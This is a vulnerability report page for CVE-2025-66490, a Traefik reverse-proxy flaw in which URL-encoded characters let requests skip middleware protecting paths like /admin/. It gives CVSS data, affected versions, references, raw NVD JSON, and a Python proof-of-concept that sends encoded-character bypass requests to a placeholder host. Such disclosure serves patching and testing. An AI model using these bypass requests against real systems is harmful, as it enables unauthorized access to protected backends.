Security Vulnerability Report
CVE-2025-66490 CVSS 6.5 MEDIUM

CVE-2025-66490

Published: 2025-12-09 01:16:56
Last Modified: 2026-03-06 15:25:34

Description

Traefik is an HTTP reverse proxy and load balancer. For versions prior to 2.11.32 and 2.11.31 through 3.6.2, requests using PathPrefix, Path or PathRegex matchers can bypass path normalization. When Traefik uses path-based routing, requests containing URL-encoded restricted characters (/, \, Null, ;, ?, #) can bypass the middleware chain and reach unintended backends. For example, a request to http://mydomain.example.com/admin%2F could reach service-a without triggering my-security-middleware, bypassing security controls for the /admin/ path. This issue is fixed in versions 2.11.32 and 3.6.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* (versionEndExcluding 2.11.32) - VULNERABLE
cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* (versionStartIncluding 3.0.0, versionEndExcluding 3.6.3) - VULNERABLE
Traefik < 2.11.32 (fixed in 2.11.32)
Traefik 3.0.0 - 3.6.2 (fixed in 3.6.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66490 Traefik Path Normalization Bypass PoC
# Affected: Traefik < 2.11.32 and 3.0.0 - 3.6.2 (fixed in 2.11.32 and 3.6.3)
# This PoC demonstrates bypassing /admin/ path protection using a URL-encoded slash.
import requests

target = "http://mydomain.example.com"
admin_path = "/admin/"
encoded_bypass = "/admin%2F"  # URL-encoded slash, sent as-is to the proxy

print("[*] CVE-2025-66490 Traefik Path Normalization Bypass PoC")
print(f"[*] Target: {target}")

# Normal request - should be blocked by the security middleware.
# Redirects are not followed so the status code reflects the proxy's own decision.
print(f"\n[1] Sending normal request to {admin_path}")
response1 = requests.get(f"{target}{admin_path}", timeout=10, allow_redirects=False)
print(f"    Status: {response1.status_code}")

# Bypass request - URL-encoded slash (%2F) may bypass the middleware.
# requests only unquotes unreserved characters, so %2F reaches the proxy intact.
print(f"\n[2] Sending bypass request to {encoded_bypass}")
response2 = requests.get(f"{target}{encoded_bypass}", timeout=10, allow_redirects=False)
print(f"    Status: {response2.status_code}")

# Additional encoded bypasses: the restricted characters named in the advisory
encoded_chars = {
    'encoded_slash': '/admin%2F',
    'encoded_backslash': '/admin%5C',
    'encoded_null': '/admin%00',
    'encoded_semicolon': '/admin%3B',
    'encoded_question': '/admin%3F',
    'encoded_hash': '/admin%23',
}

print("\n[3] Testing various URL-encoded bypasses:")
for name, path in encoded_chars.items():
    try:
        resp = requests.get(f"{target}{path}", timeout=10, allow_redirects=False)
        print(f"    {name}: Status {resp.status_code}")
    except Exception as e:
        print(f"    {name}: Error - {e}")

print("\n[*] If the bypass succeeds, status codes (and response bodies) may differ between normal and encoded requests")
print("[*] Mitigation: Upgrade to Traefik 2.11.32 or 3.6.3+")

References

https://github.com/traefik/traefik/security/advisories/GHSA-gm3x-23wp-hc2c (Exploit, Vendor Advisory)
https://github.com/traefik/traefik/releases/tag/v2.11.32 (Release Notes)
https://github.com/traefik/traefik/releases/tag/v3.6.4 (Release Notes)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66490", "sourceIdentifier": "[email protected]", "published": "2025-12-09T01:16:55.540", "lastModified": "2026-03-06T15:25:34.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Traefik is an HTTP reverse proxy and load balancer. For versions prior to 2.11.32 and 2.11.31 through 3.6.2, requests using PathPrefix, Path or PathRegex matchers can bypass path normalization. When Traefik uses path-based routing, requests containing URL-encoded restricted characters (/, \\, Null, ;, ?, #) can bypass the middleware chain and reach unintended backends. For example, a request to http://mydomain.example.com/admin%2F could reach service-a without triggering my-security-middleware, bypassing security controls for the /admin/ path. This issue is fixed in versions 2.11.32 and 3.6.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-436"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.32", "matchCriteriaId": "A212D168-0836-4D72-B2D9-9209C299471D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.6.3", "matchCriteriaId": "0ED22672-D0CC-47CC-A70A-E270FDA55FBC"}]}]}], "references": [{"url": "https://github.com/traefik/traefik/releases/tag/v2.11.32", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/releases/tag/v3.6.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/security/advisories/GHSA-gm3x-23wp-hc2c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/traefik/traefik/security/advisories/GHSA-gm3x-23wp-hc2c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}